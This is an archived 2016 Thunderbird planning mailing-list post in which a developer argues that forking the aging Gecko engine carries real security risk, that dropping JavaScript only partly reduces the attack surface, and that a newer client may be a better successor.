What happened to hiring an architect?

Jim squibblyflabbetydoo at gmail.com
Mon Dec 19 21:33:30 UTC 2016

On Mon, Dec 19, 2016 at 1:50 PM, Disaster Master <
disasterlistmanager at gmail.com> wrote:

> On 12/17/2016 7:10 AM, Magnus Melin <mkmelin+mozilla at iki.fi>
> <mkmelin+mozilla at iki.fi> wrote:
> On 16.12.2016 17:24, Disaster Master wrote:
> On 12/15/2016 7:02 PM, R Kent James <kent at caspia.com> <kent at caspia.com>
> wrote:
> Postbox's new release is on Gecko 7.0.1, which is now over 5 years old. I have not heard any great outcry about their security issues, and someone on this list (...cough..  BK...cough..ensa) keeps telling us what a great product that is, and how popular it is in Mozilla. So clearly forking Gecko is a CHOICE, and if people at Mozilla are using it then some people at Mozilla must not care that it is based on old Gecko, either.
> This supports my feeling that the security risks are actually much smaller
> for TB than they would be for, for example, Pale Moon.
> The security risks are very present,
> Only one person (Jim) has responded with any specifics on these risks, but
> alas didn't respond to my follow-up about how or whether or not it would be
> possible to mitigate said risks - regardless, I didn't grok his response,
> so have no way of knowing if the risks are real (for TB) or not.

The only way to mitigate the risks is to reduce the surface area for attack
(by limiting what features we expose to messages). However, one of TB's
selling points is that we have a very good HTML renderer; in an era where
our competition is webmail (even Mozilla itself uses Google Apps for
employee email now!), we need to support as much of HTML as reasonably
possible, or people's emails will look like crap and they'll just go back
to Gmail.

Would it not be possible to lock down TB to a specific subset of Gecko
> functions in order to let it render basic HTML emails, but minimize or even
> eliminate the security risks that would otherwise plague a full blown web
> browser?

How would we know that those features are the ones that are secure? The
only thing we can really drop is JS, since people sending mail should be
able to use anything in HTML/CSS to make their emails look the way they
want (especially important for newsletters). JS vulnerabilities are the
most common, so we've made our lives a lot easier by eliminating that, but
if people wanted to infect users via Thunderbird, I'm 99.9% sure they could
find a way to do it. As I mentioned before though, Thunderbird's userbase
is tiny compared to Firefox's (which is only ~12% of all web users), so
people likely aren't devoting much effort to finding vulns that work in

In the long run, I think Thunderbird's current position is untenable, and
even if we could fork Gecko at some point in the future, I'm not sure I'd
want to. At the moment, I'm leaning much more towards asuth's
"glodastrophe" client as a potential spiritual successor to Thunderbird. Of
course, I'm biased, since I helped write some of its backend. :)

- Jim
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.mozilla.org/pipermail/tb-planning/attachments/20161219/90e23eeb/attachment-0001.html>

More information about the tb-planning mailing list